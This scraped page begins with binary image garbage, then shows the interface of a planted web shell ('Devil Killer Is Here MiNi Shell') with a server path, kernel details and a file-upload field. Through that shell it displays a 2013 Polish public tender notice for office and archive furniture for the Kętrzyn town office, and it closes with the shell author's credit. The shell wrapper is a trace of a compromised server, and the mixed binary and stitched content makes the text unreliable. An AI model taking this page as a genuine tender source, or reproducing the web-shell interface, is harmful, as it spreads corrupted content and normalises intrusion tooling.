JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131112/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131112/459528-N-2013.html

<p class="kh_header"><b>Kętrzyn: Dostawa i montaż mebli biurowych i do archiwum w Urzędzie Miasta Kętrzyn</b><br>
<b>Numer ogłoszenia: 459528 - 2013; data zamieszczenia: 12.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Kętrzyn , ul. Wojska Polskiego 11, 11-400 Kętrzyn, woj. warmińsko-mazurskie, tel. 089 752 05 20, faks 089 752 05 31.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ketrzyn.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i montaż mebli biurowych i do archiwum w Urzędzie Miasta Kętrzyn.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1)	Przedmiot zamówienia został podzielony na dwie poniżej wskazane części:
CZĘŚĆ I    - MEBLE BIUROWE obejmująca:
1. Biurko  o wymiarach 160 cm (dł.) x 73,5 cm (gł.) x 75 cm (wys.) + 1% - szt. 1
2. Komoda 100 cm (dł.)  x 43 cm (gł.)  x 109 cm (wys.) + 1% - szt. 1
3. Komoda 146 cm (dł.)  x 43 cm (gł.)  x 91 cm (wys.) + 1% - szt. 2
4. Witryna  o wymiarach 56 cm (dł.)  x 43 cm (gł.)  x 199 cm (wys.) + 1%  - szt. 2
5. Szafa ubraniowa dwudrzwiowa o wymiarach 100 cm (szer.) x 55 cm (gł.) x 200 cm (wys.) + 1%  - szt. 1
6. Fotel biurowy -  szt. 3 
7. Krzesła  o wymiarach  43 cm (szer.) x 49 cm ( gł.) x 93 cm ( wys.) + 1% - szt. 6 
8. Stół o wymiarach  87 cm (szer.) x 77 cm ( wys.)  x 132 cm ( dł.) z możliwością rozłożenia do 182 cm + 1%  - szt. 1
9. Stół konferencyjny o wymiarach  90 cm (szer.) x 75 cm (wys.)  x  400 cm (dł.) + 1% - szt. 1
10. Stół o wymiarach  55 cm (szer.) x 75 cm ( wys.) x 155 cm ( dł.) + 1% - szt. 15 
11. Stół okrągły o średnicy 1100 cm x 75 cm ( wys.) + 1% -  szt. 4 
12. Krzesło o wymiarach  52 cm (szer.) x 52 cm (gł.) x 84 cm (wys.) wysokość siedziska 46 cm, wysokość podłokietnika 67 cm + 1% - szt. 30. 
13. Krzesło o wymiarach  52 cm (szer.) x 52 cm ( gł.) x 84 cm ( wys.)  wysokość siedziska 46 cm, bez podłokietnika + 1% - szt. 46. 
14. Krzesło o wymiarach  55 cm (szer.) x 54 cm (gł.) x 95 cm (wys.) wysokość siedziska 46 cm, wysokość podłokietnika 65 cm + 1% - szt. 14. 
15. Krzesło o wymiarach  53 cm (szer.) x 54 cm (gł.) x 84 cm (wys.) wysokość siedziska 47 cm, wysokość podłokietnika 70 cm + 1% - szt. 2. 
16. Wieszak stojący wysokość 173 cm, szer. 47 cm - 8 szt. 
17.  Szafka biurowa na segregatory o wymiarach 50 cm (szer.) x 35 cm (gł.) x 210 cm ( wys.) + 1% - szt. 2
18.  Szafka biurowa na segregatory o wymiarach 80 cm (szer.) x 35 cm (gł.) x 210 cm ( wys.) + 1% - szt. 1
19. Biurko dwuosobowe
20. Półka wisząca 146 cm (dł.) x 26 cm (gł.)  x 70 cm (wys.) + 1% - szt. 1
21. Zabudowa kuchni
a)  szafka zlewozmywakowa 80x82 cm. 
b) zabudowa zmywarki wraz ze zmywarką szer. 45 cm
c) blat na szafkę zlewozmywakową i zabudowę zmywarki
d) szafka górna nad zlewozmywakiem 80x72x30 cm
e) szafka górna nad zabudową zmywarki 45x72x30 cm
f) szafka wysoka 220x65, a w niej miejsce na chłodziarkę.
22. Wyposażenie zabudowy:
a) zmywarka o szer. 45 cm do zabudowy
b) chłodziarka
c) ekspres ciśnieniowy do kawy.
CZĘŚĆ II  - MEBLE DO ARCHIWUM obejmująca regały przesuwne:
a)	moduł o szerokości 80 cm dwustronny- 12 szt.
b)	podłoga i szyny jezdne - 1 szt.
2) Szczegółowy opis przedmiotu zamówienia w zakresie części I-II określa zał. nr 5  do SIWZ.
3) Jeżeli w opisie przedmiotu zamówienia znajdują się jakiekolwiek znaki towarowe, patent czy pochodzenie - należy przyjąć że Zamawiający podał taki opis ze wskazaniem na typ i dopuszcza składanie ofert równoważnych o parametrach techniczno- eksploatacyjno - użytkowych nie gorszych niż te podane W opisie przedmiotu Zamówienia (oferty równoważne nie mogą być gorsze pod względem posiadanych parametrów jakościowych, ilościowych oraz spełniać minimum te same funkcje) - podstawa prawna: art. 29 ust. 3 PZP.
4) Szczegółowe informacje dotyczące wykonania zamówienia zawierają istotne postanowienia umowy, stanowiące odpowiednio dla części załączniki nr 4 a) - b) do SIWZ.
5) Przedmiot zamówienia Wykonawca zobowiązany będzie dostarczyć własnym transportem do budynku Ratusza Miejskiego zlokalizowanego w Kętrzynie przy ul. Plac M.J. Piłsudskiego 1 .
6) Wykonawca udzieli gwarancji na dostarczony przedmiot zamówienia - 24 miesiące licząc od dnia podpisania protokołu zdawczo-odbiorczego..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3, 39.12.11.00-7, 39.11.20.00-0, 39.11.31.00-8, 39.14.13.00-5, 39.13.00.00-2, 39.71.10.00-0, 39.71.31.00-4, 39.70.00.00-9, 39.13.11.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1)	Zamawiający wymaga wniesienia wadium odrębnie dla każdej części zamówienia,
2)	wadium :
- dla części I - w wysokości 1.000,00 zł (jeden tysiąc zł 00/100)
- dla część II- w wysokości 250,00 zł (dwieście pięćdziesiąt zł 00/100)
należy wnieść przed upływem terminu na składanie ofert,
3)	Wadium może być wnoszone w jednej lub kilku następujących formach: 
a)	pieniądzu,
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, 
z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c) gwarancjach bankowych,
d) gwarancjach ubezpieczeniowych,
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (j.t. Dz. U. z 2007 r. Nr 42, poz. 275, z późn. zm.).
4)	Wadium wnoszone w pieniądzu należy wpłacić przelewem na następujący rachunek bankowy: Pekao SA nr konta  94 1240 5598 1111 0000 5032 0624 z dopiskiem (tytuł postępowania, część  którego wadium dotyczy) w terminie do dnia 20.11.2013 r. do godz. 12:00, a kopię dowodu wpłaty dołączyć do oferty. Za termin wniesienia wadium uważa się datę wpłynięcia środków na konto wskazane przez Zamawiającego. Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym. 
5)	wadium w pozostałych formach należy wnieść w oryginale wraz z ofertą, przy czym należy je dołączyć w sposób umożliwiający późniejszy zwrot. 
6)	Wadium musi obejmować cały okres związania ofertą. 
7)	Wadium wniesione przez jednego ze wspólników konsorcjum uważa się za wniesione prawidłowo. 
8)	Wadium składane w formie innej niż pieniądz musi zawierać klauzule gwarantujące bezwarunkową wypłatę na rzecz zamawiającego w przypadku wystąpienia okoliczności wymienionych w art. 46 ust. 4a i ust. 5 ustawy.
Okoliczności te muszą zawierać sytuacje określone:
1)	w art. 46 ust. 4a ustawy Pzp, tj. jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp nie złożył dokumentów lub  oświadczeń, o których mowa w art. 25 ust. 1 ustawy Pzp, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie
2)	w art. 46 ust. 5 ustawy Pzp, tj.: jeżeli Wykonawca, którego oferta została wybrana:
    a)  odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
c)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
d)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
9) Wykonawca, którego oferta nie będzie zabezpieczona wadium wniesionym we właściwej formie, terminie i kwocie zostanie wykluczony z przedmiotowego postępowania. 
10) Zamawiający zwróci lub zatrzyma wadium zgodnie z art. 46 ustawy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie oświadczenia o spełnianiu warunków określonych w art. 22 ust. 1 ustawy- zał. nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie oświadczenia o spełnianiu warunków określonych w art. 22 ust. 1 ustawy- zał. nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie oświadczenia o spełnianiu warunków określonych w art. 22 ust. 1 ustawy- zał. nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie oświadczenia o spełnianiu warunków określonych w art. 22 ust. 1 ustawy- zał. nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie oświadczenia o spełnianiu warunków określonych w art. 22 ust. 1 ustawy- zał. nr 2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oferta winna ponadto zawierać: 
a) wypełniony formularz oferty - zał. nr 1 do SIWZ (wypełnić stosownie do części, w której jest składana oferta); 
b) dowód wniesienia wadium;
c) pełnomocnictwo ( jeśli konieczne)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wszelkie zmiany wprowadzane do umowy wymagają obustronnej zgody oraz formy pisemnej pod rygorem nieważności z zastrzeżeniem art. 144 ustawy Prawo zamówień publicznych.
2. Strony przewidują możliwość zmiany postanowień niniejszej umowy w następujących przypadkach:
a) zmiana sposobu fakturowania w przypadku zmian organizacyjnych oraz wewnętrznych uwarunkowań podmiotów wymienionych w preambule umowy,
b) wystąpienia zdarzeń niezależnych od stron umowy, powodujących potrzebę wprowadzenia do treści umowy zmian neutralnych lub korzystnych dla Zamawiającego, bez zwiększania ustalonego wynagrodzenia,
c) zmiany terminu realizacji zamówienia ze względu na:
- względy organizacyjne leżące po stronie Zamawiającego skutkujące koniecznością zmiany terminu realizacji zamówienia,
- niezawinione przyczyny spowodowane przez  tzw. siłę wyższą, mające bezpośredni wpływ na terminowość wykonywania robót,
3. Zmiany umowy, o których mowa w ust. 2  zostaną dokonane na podstawie protokołów zawierających uzasadnienie zmian  podpisanych przez strony oraz wymagają aneksu w formie pisemnej  pod rygorem nieważności i mogą być wprowadzone jedynie w przypadku jeżeli obydwie strony umowy zgodnie uznają, ze zaszły okoliczności oraz wprowadzenie zmian jest konieczne dla prawidłowej realizacji zamówienia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.warmia.mazury.pl/ketrzyn_gmina_miejska/zamowienia_publiczne/110/status/rodzaj/wzp/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta w Kętrzynie, 11-400 Kętrzyn, ul. Wojska Polskiego 11..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.11.2013 godzina 12:00, miejsce: Urząd Miasta w Kętrzynie, 11-400 Kętrzyn, ul. Wojska Polskiego 11, Punkt Informacyjny (parter Urzędu).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Meble biurowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) CZĘŚĆ I obejmuje:
1. Biurko  o wymiarach 160 cm (dł.) x 73,5 cm (gł.) x 75 cm (wys.) + 1% - szt. 1
2. Komoda 100 cm (dł.)  x 43 cm (gł.)  x 109 cm (wys.) + 1% - szt. 1
3. Komoda 146 cm (dł.)  x 43 cm (gł.)  x 91 cm (wys.) + 1% - szt. 2
4. Witryna  o wymiarach 56 cm (dł.)  x 43 cm (gł.)  x 199 cm (wys.) + 1%  - szt. 2
5. Szafa ubraniowa dwudrzwiowa o wymiarach 100 cm (szer.) x 55 cm (gł.) x 200 cm (wys.) + 1%  - szt. 1
6. Fotel biurowy -  szt. 3 
7. Krzesła  o wymiarach  43 cm (szer.) x 49 cm ( gł.) x 93 cm ( wys.) + 1% - szt. 6 
8. Stół o wymiarach  87 cm (szer.) x 77 cm ( wys.)  x 132 cm ( dł.) z możliwością rozłożenia do 182 cm + 1%  - szt. 1
9. Stół konferencyjny o wymiarach  90 cm (szer.) x 75 cm (wys.)  x  400 cm (dł.) + 1% - szt. 1
10. Stół o wymiarach  55 cm (szer.) x 75 cm ( wys.) x 155 cm ( dł.) + 1% - szt. 15 
11. Stół okrągły o średnicy 1100 cm x 75 cm ( wys.) + 1% -  szt. 4 
12. Krzesło o wymiarach  52 cm (szer.) x 52 cm (gł.) x 84 cm (wys.) wysokość siedziska 46 cm, wysokość podłokietnika 67 cm + 1% - szt. 30. 
13. Krzesło o wymiarach  52 cm (szer.) x 52 cm ( gł.) x 84 cm ( wys.)  wysokość siedziska 46 cm, bez podłokietnika + 1% - szt. 46. 
14. Krzesło o wymiarach  55 cm (szer.) x 54 cm (gł.) x 95 cm (wys.) wysokość siedziska 46 cm, wysokość podłokietnika 65 cm + 1% - szt. 14. 
15. Krzesło o wymiarach  53 cm (szer.) x 54 cm (gł.) x 84 cm (wys.) wysokość siedziska 47 cm, wysokość podłokietnika 70 cm + 1% - szt. 2. 
16. Wieszak stojący wysokość 173 cm, szer. 47 cm - 8 szt. 
17.  Szafka biurowa na segregatory o wymiarach 50 cm (szer.) x 35 cm (gł.) x 210 cm ( wys.) + 1% - szt. 2
18.  Szafka biurowa na segregatory o wymiarach 80 cm (szer.) x 35 cm (gł.) x 210 cm ( wys.) + 1% - szt. 1
19. Biurko dwuosobowe
20. Półka wisząca 146 cm (dł.) x 26 cm (gł.)  x 70 cm (wys.) + 1% - szt. 1
21. Zabudowa kuchni
a)  szafka zlewozmywakowa 80x82 cm. 
b) zabudowa zmywarki wraz ze zmywarką szer. 45 cm
c) blat na szafkę zlewozmywakową i zabudowę zmywarki
d) szafka górna nad zlewozmywakiem 80x72x30 cm
e) szafka górna nad zabudową zmywarki 45x72x30 cm
f) szafka wysoka 220x65, a w niej miejsce na chłodziarkę.
22. Wyposażenie zabudowy:
a) zmywarka o szer. 45 cm do zabudowy
b) chłodziarka
c) ekspres ciśnieniowy do kawy.
2) Szczegółowy opis przedmiotu zamówienia w zakresie części I określa zał. nr 5  do SIWZ.
3) Jeżeli w opisie przedmiotu zamówienia znajdują się jakiekolwiek znaki towarowe, patent czy pochodzenie - należy przyjąć że Zamawiający podał taki opis ze wskazaniem na typ i dopuszcza składanie ofert równoważnych o parametrach techniczno- eksploatacyjno - użytkowych nie gorszych niż te podane W opisie przedmiotu Zamówienia (oferty równoważne nie mogą być gorsze pod względem posiadanych parametrów jakościowych, ilościowych oraz spełniać minimum te same funkcje) - podstawa prawna: art. 29 ust. 3 PZP.
4) Szczegółowe informacje dotyczące wykonania zamówienia zawierają istotne postanowienia umowy, stanowiące załącznik nr 4 a) do SIWZ.
5) Przedmiot zamówienia Wykonawca zobowiązany będzie dostarczyć własnym transportem do budynku Ratusza Miejskiego zlokalizowanego w Kętrzynie przy ul. Plac M.J. Piłsudskiego 1 .
6) Wykonawca udzieli gwarancji na dostarczony przedmiot zamówienia - 24 miesiące licząc od dnia podpisania protokołu zdawczo-odbiorczego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3, 39.12.11.00-7, 39.11.20.00-0, 39.11.31.00-8, 39.14.13.00-5, 39.13.00.00-2, 39.71.10.00-0, 39.71.31.00-4, 39.70.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Meble do archiwum.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. CZĘŚĆ II obejmuje regały przesuwne:
a)	moduł o szerokości 80 cm dwustronny- 12 szt.
b)	podłoga i szyny jezdne - 1 szt.
2) Szczegółowy opis przedmiotu zamówienia w zakresie części II określa zał. nr 5  do SIWZ.
3) Jeżeli w opisie przedmiotu zamówienia znajdują się jakiekolwiek znaki towarowe, patent czy pochodzenie - należy przyjąć że Zamawiający podał taki opis ze wskazaniem na typ i dopuszcza składanie ofert równoważnych o parametrach techniczno- eksploatacyjno - użytkowych nie gorszych niż te podane W opisie przedmiotu Zamówienia (oferty równoważne nie mogą być gorsze pod względem posiadanych parametrów jakościowych, ilościowych oraz spełniać minimum te same funkcje) - podstawa prawna: art. 29 ust. 3 PZP.
4) Szczegółowe informacje dotyczące wykonania zamówienia zawierają istotne postanowienia umowy, stanowiące załączniki nr 4 b) do SIWZ.
5) Przedmiot zamówienia Wykonawca zobowiązany będzie dostarczyć własnym transportem do budynku Ratusza Miejskiego zlokalizowanego w Kętrzynie przy ul. Plac M.J. Piłsudskiego 1 .
6) Wykonawca udzieli gwarancji na dostarczony przedmiot zamówienia - 24 miesiące licząc od dnia podpisania protokołu zdawczo-odbiorczego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.13.11.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com